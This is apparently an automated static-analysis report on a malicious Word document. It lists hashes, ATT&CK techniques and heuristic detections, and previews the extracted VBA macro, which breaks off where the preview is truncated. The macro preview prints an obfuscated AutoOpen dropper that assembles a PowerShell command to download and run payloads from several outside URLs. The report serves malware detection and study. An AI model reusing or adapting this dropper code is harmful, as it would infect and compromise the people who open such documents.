Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 55db6c404b252f37…

MALICIOUS

Office (OLE)

124.5 KB Created: 2018-02-12 17:51:00 Authoring application: Microsoft Office Word First seen: 2018-02-19
MD5: d42f578dfc373a0752bb65c4051099dc SHA-1: 15974c3b99d94d26636c4e642ce25cb60f9ca4c0 SHA-256: 55db6c404b252f370869f187b8cecede16488678936d44a0d785ab1012a19f0f
242 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1059 Command and Scripting Interpreter T1204.002 Malicious File

The sample is a malicious Office document containing a VBA macro with an AutoOpen function. This macro utilizes the Shell() function, indicating an attempt to execute arbitrary commands, likely to download and run a secondary payload. The ClamAV detection and heuristic firings strongly suggest malicious intent, but the specific family could not be determined.

Heuristics 7

  • ClamAV: Doc.Dropper.Agent-6447065-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6447065-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://ersmgY+l In document text (OLE body)
    • http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 24437 bytes
SHA-256: 68d752feeb19971618b01df619a13baecf5a60c197495cc39c1be8bd08fd56ea
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "NTiRlViMWCoM"
Sub AutoOpen()
On Error Resume Next
kKUjAqItU = tPIWAd - Sgn(LsrrmXNlSb) - (31585 - Tan(8884268) / 9985737 - ChrW(FRuUhKcuupL))
zACdWuPvE = HfiwnGzhOIz - Sgn(iowNBSS) - (538630 - Tan(3381980) / 9706127 - ChrW(fmW))
LIwhkwvzz = MVuEfMfhMiV - Sgn(fIswdB) - (3788362 - Tan(1754384) / 5609281 - ChrW(LQu))
Application.Run "rPWABqzMqXKuA", cwNlbCl
plhXAZirM = jYN - Sgn(FSUTHAzc) - (7701132 - Tan(7784128) / 7607144 - ChrW(ufoJKJd))
KpawKLFrW = HMYPdOq - Sgn(jEPwM) - (9485002 - Tan(8659811) / 6930665 - ChrW(izCCqWvDii))
UKHCJaJjb = FQRzAa - Sgn(NNcd) - (1002311 - Tan(4998061) / 6132210 - ChrW(sTQRqcLvj))
End Sub
Function cwNlbCl()
On Error Resume Next
oXZDbSiNo = hunN - Sgn(hTXMCR) - (4026657 - Tan(5037899) / 3145667 - ChrW(KOwCBuSDMwihK))
stdirLokicU = REYSLnHcbjWw - Sgn(urfDLjuz) - (1805094 - Tan(9477216) / 6612726 - ChrW(OPraQfA))
BioPFzh = jvwtC - Sgn(ckimPf) - (526565 - Tan(3982413) / 4574990 - ChrW(htWzQ))
wBToawY = VThzwowI + Mid(TVCPpuESwHuz + "QnSEFAYKtTATRTcYHVHNmsccr]39-CrepLacE ([cHar]112+[cHar]119+[cHar]68),[cHar]124)sdP .( 50lP'+'SHoMe[21]+50lPSHOMe[34]+l5Mxl5M)') -RePlaCe '50l',[Char]36 -crePLAcE  'l5M',[Char]39 -RePlaCkhobwrDjvDWO" + lAmKXtkV, 25, 161)
ZlnZTmOBi = OINfYSusa - Sgn(HWkZmhCjlIms) - (3719639 - Tan(9493824) / 8698999 - ChrW(CjwdD))
wNGrjXAqpn = kvTuDOSNwfiN - Sgn(ZCRQXPXjYoV) - (7990924 - Tan(3006449) / 7303921 - ChrW(PLvwmS))
KCnCjJ = pFsdoOYKHKG - Sgn(TIlSZ) - (2679283 - Tan(6122072) / 1136293 - ChrW(GwEoc))
hpXnEsh = HHpwwYQBKBWpp + Mid(tmAwHJRWhDQtrf + "pTmgYch(tL8asfc in mgY+mgYtLmg'+'Y+mgY8AngS+ngSDC'+'X){try{tL8YYU.ls2mgYngS+ngS+mgYDo0qIWnmgY+mgYl0qmgY+mgYngSl5M'+'+l5M+ngSImgY+mg'+'YOal5M+'+'l5MmgY+mgYdF'+'ImgY+mgY0mgY+mgYqIlmgY+mguApUbZktQGHTHWioadRw" + XIDswnqDESEUj, 3, 182)
iPDKRpGDojl = FdsWiHM - Sgn(jHopLJaXX) - (4723081 - Tan(6167219) / 8842769 - ChrW(vavfmWvzYn))
VsZvF = lKzUtND - Sgn(FMcEjEP) - (9963271 - Tan(7061845) / 8155980 - ChrW(mDJlJ))
AHlNSJ = zqw - Sgn(RdLTSEBJFdJ) - (4130811 - Tan(2495862) / 7717928 - ChrW(SWMaWWK))
aQAXt = zmklaSn + Mid(LXtbJ + "BiAKe 'sdP',[Char]124) ) GPLiCUUkifjLFioCFwoLKDoIWFUDEPuO" + OhLjD, 5, 21)
cqcKqjCf = RqjkQZN - Sgn(VzTA) - (5412223 - Tan(5622743) / 3784049 - ChrW(jnOizlBmwaIj))
TciVU = uMjbGGzlMG - Sgn(VhNTQPYkWr) - (6124114 - Tan(2693347) / 476919 - ChrW(Vjouo))
fokTwwi = QjcbljZVWUCU - Sgn(jISXiVjBYK) - (7619555 - Tan(2830749) / 9732386 - ChrW(PlaKrXQRoE))
IzXkPbqJ = NASbYqRw + Mid(GiojRkQA + "wwlhKBCl5MmgY+'+'mg'+'YtmgY+mgY.megaxl5M+l'+'5MusmgY+mgY.mgY+mgYcom/v1/images/amgY+mgYrmgY+mgYticmgY+mgYlel5M+l5Mml5M+l5MgY+mgY/mgY+mgYIpjKmgY+mgYJT/?http:l5M+l5MmgY+mgY//wngS+ngSww.umbriawi'OYopAFVOmaKIPOhtKMpcwhMU" + qfMBRq, 8, 184)
QkvjtMdKqaO = zPPUO - Sgn(AnqwJIwDRLM) - (6761009 - Tan(3375048) / 703961 - ChrW(PdZSQZv))
jJjvLkS = jTSsdNRFio - Sgn(GlQoiNpI) - (4133101 - Tan(8154037) / 9378036 - ChrW(iGt))
zTrlqjjGG = mqBzLEIKfr - Sgn(UqzFdu) - (8856470 - Tan(9409453) / 6340828 - ChrW(oqEaQZpjSomkfi))
FHYtjq = ihpDOCpKhVDC + Mid(GYHns + "mZXLnOcMzLUTh & ( $verbosEPrefErEnCe.tOsTRinG()[1,3]+'X'-jOIN'')((('((l5M (ngS((mngS+ngSgY'+'tL8nsadasd = &(EmgY+mgYnmgY+mgYynEny+EmgY'+'+mgY'+'nyeEny+l5M+l5MEl5M+l5Mnyw-obmgY+mgYjphiqiobPUjOBKUXOitAitCG" + oMmCJjvJ, 14, 167)
jGbSnABS = iTaNDdkKUqzEi - Sgn(EsizGFwEEQMDd) - (4646236 - Tan(9314408) / 6188981 - ChrW(jTRXJf))
nZdjuF = nUkHBuVBCOIqTz - Sgn(SwaOJAzAMOoa) - (2580604 - Tan(7101489) / 3281582 - ChrW(uMiMmUqC))
UGZzOF = vLBOQ - Sgn(MPsB) - (4032572 - Tan(9432828) / 8943455 - ChrW(voTYtMTI))
KfWDYJcHFP = jqLCcGJqw + Mid(SVkSFkJ + "rF+'f'+'i.it/Ue8J/?http://ersmgY+l'+'5M+l5MmgYte.vipl5M+l5Mmgl5M+l5MY+mgY/nH0tmgY+mgYN/EnQJDAiqprHd" + jwzzX, 3, 87)
uZWrDNDzDt = mXSwzpqmuQXC - Sgn(bcoDPZpHG) - (8156424 - Tan(6501178) / 5387682 - ChrW(kInjoRNmwPm))
WbJQMKtTam = HiN - S
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.